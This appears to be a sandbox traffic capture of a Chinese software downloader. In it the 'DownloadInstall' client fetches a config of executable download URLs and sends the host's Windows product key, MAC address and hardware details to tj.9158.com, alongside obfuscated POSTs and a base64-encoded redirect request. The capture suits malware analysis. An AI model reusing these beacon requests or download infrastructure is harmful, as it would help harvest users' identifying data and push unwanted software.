Set-Cookie: pt_local_token=-1924241393; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
Content-type: text/html
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var reportUrl = location.protoco
<<< skipped >>>
GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....
GET /Opendownloadernewxml.aspx?softlist=&lmarkid=88 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Title>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>http://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>http://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...<Setuptime>20</Setuptime>...<ToolIcon>9158........</ToolIcon>...<Item>9158ktv</Item>...<Mtype>19</Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>..</config>......
<<< skipped >>>
GET /temp/downloaderico/main.ico HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:17 GMT
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:6d64"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 fuzhou183:8111 (Cdn Cache Server V2.0), 1.1 db77:10 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
GET /1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 17990.vicp.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 07 Nov 2015 04:59:45 GMT
Content-Type: text/html
Content-Length: 102
Connection: keep-alive
ETag: "550c2d1a-66"
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17476535.js"></script>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00089320501911494410110713
Server: Apache
tracecode: 00089320501911494410110713
Set-Cookie: BAIDUID=DA04B4066DA68D7236FB11CB7AC286DA:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991409270581376522110712
Server: Apache
tracecode: 35991409270581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B8CA6E1AA9F73D13D:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dc.base/1.0.3/css/base.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.daicuo.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:58:41 GMT
Content-Type: text/css
Content-Length: 1691
Last-Modified: Thu, 16 Apr 2015 11:10:24 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "552f98a0-69b"
Expires: Sat, 07 Nov 2015 16:58:41 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
@font-face{font-family:'iconfont';src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot');src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot?#iefix') format('embedded-opentype'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.woff') format('woff'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.ttf') format('truetype'),url('http://at.alicdn.com/t/font_1415073294_4967172.svg#iconfont') format('svg');}.iconfont{position:relative;top:1px;display:inline-block;font-weight:normal;line-height:1;font-family:"iconfont" !important;font-style:normal;-webkit-font-smoothing:antialiased;-webkit-text-stroke-width:0.2px;-moz-osx-font-smoothing:grayscale;}.iconfont:empty{width:1em;}.icon-tsina:before{content:"\1111";}.icon-tqq:before{content:"\5555";}.icon-weixin:before{content:"\e607";}.icon-qq:before{content:"\7777";}.icon-qzone:before{content:"\9999";}.icon-top:before{content:"\4444";}.icon-dingyue:before{content:"\2222";}.icon-github:before{content:"\3333";}.icon-ma:before{content:"\6666";}.icon-yuedu:before{content:"\8888";}.icon-biaoqing:before{content:"\e600";}.icon-chuangshiren:before{content:"\e602";}.icon-guanliyuan:before{content:"\e601";}.icon-fenxiang:before{content:"\e603";}.icon-qz:before{content:"\e604";}.icon-addgroup:before{content:"\e605";}.icon-qunzu:before{content:"\e606";}.icon-tuijian:before{content:"\e608";}.icon-discover:before{content:"\e60a";}.icon-website:before{content:"\e60c";}.icon-audit:before{content:"\e612";}.icon-music:before{content:"\e60e";}.icon-video:before{content:"
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00058821140271667466110713
Server: Apache
tracecode: 00058821140271667466110713
Set-Cookie: BAIDUID=DC3B4452E5376F0DF4258E7C406A2A02:FG=1; expires=Sun, 06-Nov-16 05:00:05 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999935041911494410110712
Server: Apache
tracecode: 35999935041911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BFBF5A997083E266E:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /?89-sd--ant- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065; expires=Sat, 07-Nov-2015 05:59:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP
2218..<!DOCTYPE html>..<html lang="zh-cn">..<head>..<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">..<meta name="renderer" content="webkit">..<title>.................._...1..._.........</title>..<meta name="keywords" content="" />..<meta name="description" content="" />..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />..<link rel="stylesheet" type="text/css" href="hXXp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.base.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.task.css?1.0.247" />..<!--[if lt IE 9]>..<script src="/Public/html5shiv/3.7.2/html5shiv.min.js"></script>..<script src="/Public/respond/1.4.2/respond.min.js"></script>..<![endif]-->..<script>var dc={root:"/",domain:"VVV.xieshouz.com",id:"",page:"1",userid:"",username:"",'lazyload':""};</script>..</head>..<body>..<nav class="navbar navbar-inverse" role="navigation">.. <div class="container">.. <div class="row"><div class="col-md-12 col-md-offset-0">.. <div class="navbar-header">.. <butto
<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:49 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
GET /Public/respond/1.4.2/respond.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: application/javascript
Content-Length: 4381
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-111d"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.. position: relative;...font-family: "Helvetica Neue","Microsoft YaHei","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -webkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap fieldset*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap nav*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...navbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inverse .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size: 1.1em;..}../*bootstrap page*/...pagination > li > a,...pagination > li > span {.. position: relative;.. float: left;.. padding: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #222;.. text-decoration: none;.. background-color: #fff;.. border: 1px solid #ddd;..}...pagination > li.disabled > a{.. font-weight: bold;...}...pagination > li > a:hover,...pagination > li > span:hover,...pagination > li > a:focus,...pagination > li > span:focus {.. color: #2cab93;.. background-color: #eee;..
<<< skipped >>>
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. overflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.lead{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.lead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...margin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}...dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.dc-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. margin-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidden;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-size:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margin:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{...font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-bottom: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...overflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;..}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .apply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-image{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..
<<< skipped >>>
GET /Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:57 GMT
Content-Type: application/javascript
Content-Length: 36816
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "557f7832-8fd0"
Expires: Sat, 07 Nov 2015 16:59:57 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991274551213477898110712
Server: Apache
tracecode: 35991274551213477898110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BCA2EF032D9175BBE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016551091911494410110713
Server: Apache
tracecode: 00016551091911494410110713
Set-Cookie: BAIDUID=69DAC83DF6D595A311E23693EE9228DF:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008213770658453514110713
Server: Apache
tracecode: 00008213770658453514110713
Set-Cookie: BAIDUID=32F3C5706F8B24028AF7668DD8FF2F78:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
